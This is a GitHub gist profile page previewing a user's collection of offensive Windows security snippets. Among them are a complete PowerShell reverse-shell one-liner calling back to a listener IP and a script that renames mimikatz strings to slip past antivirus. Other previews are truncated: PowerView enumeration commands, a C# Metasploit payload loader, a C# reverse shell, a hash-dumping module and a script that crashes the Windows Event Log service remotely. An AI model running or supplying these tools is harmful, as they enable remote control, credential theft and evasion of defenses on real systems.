Skip to content

Instantly share code, notes, and snippets.

View jessefmoore's full-sized avatar

Jesse Moore jessefmoore

99 followers · 477 following
View GitHub Profile
@jessefmoore
jessefmoore / PowerView-2.0-tricks.ps1
Created January 17, 2020 20:41 — forked from HarmJ0y/PowerView-2.0-tricks.ps1
PowerView-2.0 tips and tricks
# NOTE: the most updated version of PowerView (http://www.harmj0y.net/blog/powershell/make-powerview-great-again/)
# has an updated tricks Gist at https://gist.github.com/HarmJ0y/184f9822b195c52dd50c379ed3117993
# get all the groups a user is effectively a member of, 'recursing up'
Get-NetGroup -UserName <USER>
# get all the effective members of a group, 'recursing down'
Get-NetGroupMember -GoupName <GROUP> -Recurse
# get the effective set of users who can administer a server
@jessefmoore
jessefmoore / RS.ps1
Created February 2, 2020 17:27 — forked from ohpe/RS.ps1
PowerShell Reverse Shell
powershell -nop -exec bypass -c "$client = New-Object System.Net.Sockets.TCPClient('<LISTENERIP>',443);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"
@jessefmoore
jessefmoore / quick_and_dirty_zeek_into_elastic.md
Created May 2, 2020 18:43 — forked from neu5ron/quickly_get_zeek_into_elastic.md
hackathon quick hack to get into any Elastic

Understanding of Zeek Fields

use the following OSSEM branch

Prep Elasticsearch

You only need to do this one time skip this section if you have done this once already and go to the "Upload data section"

Login/browse to your Kibana instance Go to Dev Tools (which is the wrench icon in the bottom left)

@jessefmoore
jessefmoore / mimikatz_obfuscator.sh
Created July 21, 2020 16:22 — forked from S3cur3Th1sSh1t/mimikatz_obfuscator.sh
Mimikatz Obfuscator
# This script downloads and slightly "obfuscates" the mimikatz project.
# Most AV solutions block mimikatz based on certain keywords in the binary like "mimikatz", "gentilkiwi", "benjamin@gentilkiwi.com" ...,
# so removing them from the project before compiling gets us past most of the AV solutions.
# We can even go further and change some functionality keywords like "sekurlsa", "logonpasswords", "lsadump", "minidump", "pth" ....,
# but this needs adapting to the doc, so it has not been done, try it if your victim's AV still detects mimikatz after this program.
git clone https://github.com/gentilkiwi/mimikatz.git windows
mv windows/mimikatz windows/candycrush
find windows/ -type f -print0 | xargs -0 sed -i 's/mimikatz/candycrush/g'
find windows/ -type f -print0 | xargs -0 sed -i 's/MIMIKATZ/CANDYCRUSH/g'
@jessefmoore
jessefmoore / WAHH_Task_Checklist.md
Created July 27, 2020 14:36 — forked from jhaddix/Testing_Checklist.md
The Web Application Hacker's Handbook - Task Checklist - Github-Flavored Markdown
@jessefmoore
jessefmoore / msfsharp.cs
Created August 13, 2020 14:44
Run MSF payloads from C#
using System;
using System.IO;
using System.Runtime.InteropServices;
namespace UnmanagedCode
{
class Program
{
[DllImport("kernel32")]
static extern IntPtr VirtualAlloc(IntPtr ptr, IntPtr size, IntPtr type, IntPtr mode);
@jessefmoore
jessefmoore / reverse2.cs
Created August 13, 2020 14:50
C# Reverse Shell
/*
Reference: http://www.codeproject.com/Articles/20250/Reverse-Connection-Shell
*/
using System;
using System.Text;
using System.IO;
using System.Diagnostics;
using System.ComponentModel;
using System.Linq;
@jessefmoore
jessefmoore / Invoke-PowerDump.ps1
Last active August 14, 2020 17:31
PowerDump.ps1 from EmpireOld
# Pulled from https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-PowerDump.ps1
# Pulled from darkoperator's Posh-SecMod:
# https://github.com/darkoperator/Posh-SecMod/blob/master/PostExploitation/PostExploitation.psm1
function Invoke-PowerDump
{
<#
.SYNOPSIS
Dumps hashes from the local system. Note: administrative privileges required.
.DESCRIPTION
Generate a command for dumping hashes from a Windows System PowerShell.exe -command
@jessefmoore
jessefmoore / eventvwr_crash.py
Created September 19, 2020 03:29 — forked from byt3bl33d3r/eventvwr_crash.py
Crash the Windows Event Log service remotely (needs admin privs)
# Crash the Windows Event Log Service remotely, needs Admin privs
# originally discovered by limbenjamin and accidently re-discovered by @byt3bl33d3r
#
# Once the service crashes 3 times it will not restart for 24 hours
#
# https://github.com/limbenjamin/LogServiceCrash
# https://limbenjamin.com/articles/crash-windows-event-logging-service.html
#
# Needs the impacket library (https://github.com/SecureAuthCorp/impacket)
@jessefmoore
jessefmoore / feedly-olafhartong-2020-09-24.opml
Created September 24, 2020 20:32 — forked from olafhartong/feedly-olafhartong-2020-09-24.opml
<?xml version="1.0" encoding="UTF-8"?>
<opml version="1.0">
<head>
<title>Olaf subscriptions in feedly Cloud</title>
</head>
<body>
<outline text="PublicFeeds" title="PublicFeeds">
<outline type="rss" text="top scoring links : netsec" title="top scoring links : netsec" xmlUrl="http://www.reddit.com/r/netsec/top/.rss" htmlUrl="https://www.reddit.com/r/netsec/top/"/>
<outline type="rss" text="For [Blue|Purple] Teams in Cyber Defence" title="For [Blue|Purple] Teams in Cyber Defence" xmlUrl="https://www.reddit.com/r/blueteamsec.rss" htmlUrl="https://www.reddit.com/r/blueteamsec"/>